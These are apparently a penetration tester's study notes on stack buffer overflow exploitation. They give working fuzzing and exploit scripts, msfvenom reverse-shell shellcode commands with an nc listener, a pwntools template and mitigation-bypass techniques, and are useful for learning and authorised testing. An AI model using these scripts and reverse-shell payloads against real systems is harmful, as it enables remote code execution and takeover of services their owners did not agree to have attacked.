Pentest_Notes

💣 Exploit Development & Buffer Overflows

Organized notes for exploit development and buffer overflow techniques. Last Updated: 2026-03-27


Overview

Exploit development is the craft of turning a vulnerability, most often a memory corruption bug such as a stack-based buffer overflow, into reliable code execution. Knowing the mechanics lets you adapt public exploits (new offsets, return addresses, bad characters) and write your own when none exists.


Buffer Overflow — Methodology

Checklist


Stack-Based Buffer Overflow (x86)

Step 1: Fuzzing

#!/usr/bin/env python3
import socket

target_ip = "TARGET_IP"
target_port = TARGET_PORT
buffer = b"A" * 100

while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((target_ip, target_port))
        s.send(buffer + b"\r\n")
        s.recv(1024)
        s.close()
        print(f"[+] Sent {len(buffer)} bytes")
        buffer += b"A" * 100   # grow after reporting, so the printed size is the one actually sent
    except OSError:
        # timeout, refused or reset: the service most likely crashed on the last length.
        # Note this length and confirm the crash (EIP = 41414141) in the debugger.
        print(f"[!] Crashed at {len(buffer)} bytes")
        break

Step 2: Find Exact Offset

# Generate a cyclic pattern as long as the crash length and send it in place of the A's
msf-pattern_create -l <CRASH_LENGTH>

# After the crash, look up the EIP value exactly as the debugger shows it (the tool handles endianness)
msf-pattern_offset -l <CRASH_LENGTH> -q <EIP_VALUE>
# Immunity alternative once the pattern has been sent: !mona findmsp

Step 3: Verify EIP Control

offset = <OFFSET_VALUE>        # from msf-pattern_offset
crash_length = <CRASH_LENGTH>  # length that crashed the service in Step 1
eip = b"B" * 4
buffer = b"A" * offset + eip + b"C" * (crash_length - offset - 4)
# Send and verify EIP = 42424242. Also note where ESP points: it should land in
# the C's, which is what the JMP ESP in Step 5 relies on.

Step 4: Find Bad Characters

# All byte values 0x01-0xff; 0x00 is excluded up front because it terminates C strings
badchars = (
    b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"
    b"\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
    b"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
    b"\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
    b"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f"
    b"\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
    b"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f"
    b"\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
    b"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f"
    b"\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
    b"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf"
    b"\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
    b"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf"
    b"\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
    b"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"
    b"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
# Send the sequence right after the EIP overwrite, then compare the stack dump in the
# debugger against what was sent (!mona bytearray -b "\x00" writes the same sequence to
# bytearray.bin for !mona compare). Only the first mismatch per round is trustworthy,
# since everything after a bad byte is often mangled or truncated: remove that one byte,
# regenerate, resend, and repeat until the dump matches.

Step 5: Find JMP ESP

# In Immunity Debugger with mona; -cpb lists every bad char from Step 4 so the address itself is usable.
# Prefer a module without ASLR, SafeSEH or rebase (mona shows these flags in the results).
!mona jmp -r esp -cpb "\x00"

# Or use msf-nasm_shell
msf-nasm_shell
nasm> JMP ESP
# Returns: FFE4

Step 6: Generate Shellcode

# Windows reverse shell; -b must list every bad char found in Step 4, and EXITFUNC=thread
# keeps the service alive after the shell exits
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -b '\x00' -f python -v shellcode EXITFUNC=thread

# Linux reverse shell
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -b '\x00' -f python -v shellcode

Step 7: Final Exploit

#!/usr/bin/env python3
import socket, struct

target_ip = "TARGET_IP"
target_port = TARGET_PORT
offset = OFFSET_VALUE
# JMP ESP address from Step 5, packed little-endian; none of its four bytes may be
# a bad character, or the overwrite itself will be mangled
jmp_esp = struct.pack("<I", JMP_ESP_ADDRESS)
# The msfvenom decoder stub unpacks on the stack and can clobber the start of the
# payload without some padding, so keep a small NOP sled in front of it
nop_sled = b"\x90" * 16

shellcode = b""  # Paste msfvenom output here (generated with -b listing every bad char from Step 4)

buffer = b"A" * offset + jmp_esp + nop_sled + shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
s.sendall(buffer + b"\r\n")
s.close()
print("[+] Exploit sent! Check the listener (nc -lvnp <PORT>)")
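The Step 2 to Step 7 workflow above, as an added offline example that is not part of the original notes: pure-Python equivalents of msf-pattern_create / msf-pattern_offset, the Step 3 EIP check payload, a bad-character comparer that handles the truncation case, and a payload builder that refuses a return address or shellcode containing a known bad character. The EIP value 0x39654138, the offset 146, the JMP ESP address 0x0BADF00D, the stand-in shellcode and the debugger dump in the demo are all made-up inputs.

```python
#!/usr/bin/env python3
"""Offline helpers mirroring Steps 2-4 and 7 of the methodology (added example,
not from the original notes). All concrete values in the demo are made up."""
import string
import struct
from itertools import product


def cyclic_pattern(length):
    """Same scheme as msf-pattern_create: Aa0Aa1...Aa9Ab0...Az9Ba0... Every 4-byte
    window is unique within the first 20280 bytes, so the 4 bytes that land in
    EIP pinpoint the offset."""
    out = bytearray()
    for upper, lower, digit in product(string.ascii_uppercase,
                                       string.ascii_lowercase, string.digits):
        if len(out) >= length:
            break
        out += f"{upper}{lower}{digit}".encode()
    return bytes(out[:length])


def pattern_offset(pattern, eip_value):
    """Mirror msf-pattern_offset -q: EIP holds the overwritten bytes little-endian,
    so 0x39654138 in the debugger means b'8Ae9' hit the return address."""
    idx = pattern.find(struct.pack("<I", eip_value))
    return None if idx == -1 else idx


def eip_check_payload(offset, total_len):
    """Step 3 layout: filler | 'BBBB' (expect EIP = 0x42424242) | padding to the crash length."""
    if total_len < offset + 4:
        raise ValueError("crash length too small for offset + 4")
    return b"A" * offset + b"B" * 4 + b"C" * (total_len - offset - 4)


def badchar_sequence(exclude=b"\x00"):
    """Step 4 probe: every byte value in order, minus the ones already known bad."""
    return bytes(b for b in range(256) if b not in exclude)


def first_bad_char(sent, observed):
    """Compare the probe with the bytes dumped from the stack after the crash.
    Only the first divergence is trustworthy (a bad byte usually mangles or
    truncates everything after it), so drop that byte, resend, repeat.
    Returns the offending byte value, or None when the dump matches."""
    for i in range(min(len(sent), len(observed))):
        if sent[i] != observed[i]:
            return sent[i]
    if len(observed) < len(sent):
        return sent[len(observed)]  # input truncated at this byte (typical for 0x0a / 0x0d)
    return None


def build_payload(offset, jmp_esp_addr, shellcode, badchars=b"\x00",
                  nop_len=16, total_len=None):
    """Step 7 layout: filler | JMP ESP address (LE) | NOP sled | shellcode.
    Refuses an address or shellcode containing a known bad character, the most
    common reason an otherwise correct exploit silently fails."""
    ret = struct.pack("<I", jmp_esp_addr)
    for name, blob in (("JMP ESP address", ret), ("shellcode", shellcode)):
        hit = set(blob) & set(badchars)
        if hit:
            raise ValueError(f"{name} contains bad char(s): {sorted(hex(b) for b in hit)}")
    payload = b"A" * offset + ret + b"\x90" * nop_len + shellcode
    if total_len is not None:
        if len(payload) > total_len:
            raise ValueError("payload exceeds the crash length the service accepted")
        payload += b"C" * (total_len - len(payload))
    return payload


if __name__ == "__main__":
    pat = cyclic_pattern(500)
    print("offset for EIP=0x39654138:", pattern_offset(pat, 0x39654138))  # 146
    probe = badchar_sequence()
    # constructed debugger dump: the service truncated the input at 0x0a
    dump = probe[:probe.index(0x0a)]
    print("first bad char:", hex(first_bad_char(probe, dump)))            # 0xa
    # 0x0BADF00D is a made-up JMP ESP address; \xcc bytes stand in for shellcode
    print("payload length:", len(build_payload(146, 0x0BADF00D, b"\xcc" * 4)))  # 170
```

The comparer deliberately reports one byte per round rather than a list: after a truncating byte such as 0x0a the rest of the dump is missing, and after a substituted byte the remaining bytes are frequently shifted, so a single-pass diff would flag good bytes as bad.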

Modern Protections & Bypasses

Protection      Description                                   Bypass technique
DEP/NX          Stack/heap pages are not executable           ROP chains (e.g. ret2libc, or VirtualProtect/mprotect then jump to shellcode)
ASLR            Randomized load addresses                     Information leak, partial overwrite, gadgets in a module loaded without ASLR
Stack canaries  Cookie placed before the saved return address Leak the cookie, byte-wise brute force against forking services, or overwrite SEH / function pointers instead
SafeSEH         Handlers checked against a registered table   POP POP RET from a module compiled without SafeSEH
CFG             Control Flow Guard validates indirect calls   Overwrite return addresses (not checked by CFG) or target code in non-CFG modules

Tools

Tool                         Purpose
GDB + GEF/PEDA               Linux debugging
Immunity Debugger + mona.py  Windows (32-bit) debugging and exploit helpers
x64dbg                       Modern Windows debugger (32/64-bit)
ROPgadget                    Gadget search and ROP chain generation
pwntools                     Python exploit development library
msfvenom                     Shellcode generation and encoding
radare2 / Ghidra             Reverse engineering

GDB with GEF

# Start GDB with GEF
gdb ./binary
gef> checksec                  # which mitigations (NX, canary, PIE, RELRO) are compiled in
gef> pattern create 500        # cyclic pattern to feed the program
gef> run                       # supply the pattern as input and wait for the crash
gef> pattern offset $eip       # or: pattern offset 0x41414141 (the value seen in EIP)

Pwntools Template

#!/usr/bin/env python3
from pwn import *

context.binary = './binary'        # sets arch/bits/endianness from the ELF headers
context.log_level = 'debug'

offset = OFFSET_VALUE              # from: gef> pattern offset $eip
return_address = ADDRESS           # e.g. a jmp esp / call esp gadget (ROPgadget --binary ./binary)
shellcode = asm(shellcraft.sh())   # or paste msfvenom bytes here

p = process('./binary')
# p = remote('target', port)

payload = b"A" * offset
payload += p32(return_address)     # p64() on x86-64, or pack() to follow context.bits
payload += b"\x90" * 16
payload += shellcode

p.sendline(payload)
p.interactive()

Common Pitfalls / Gotchas

References & Further Reading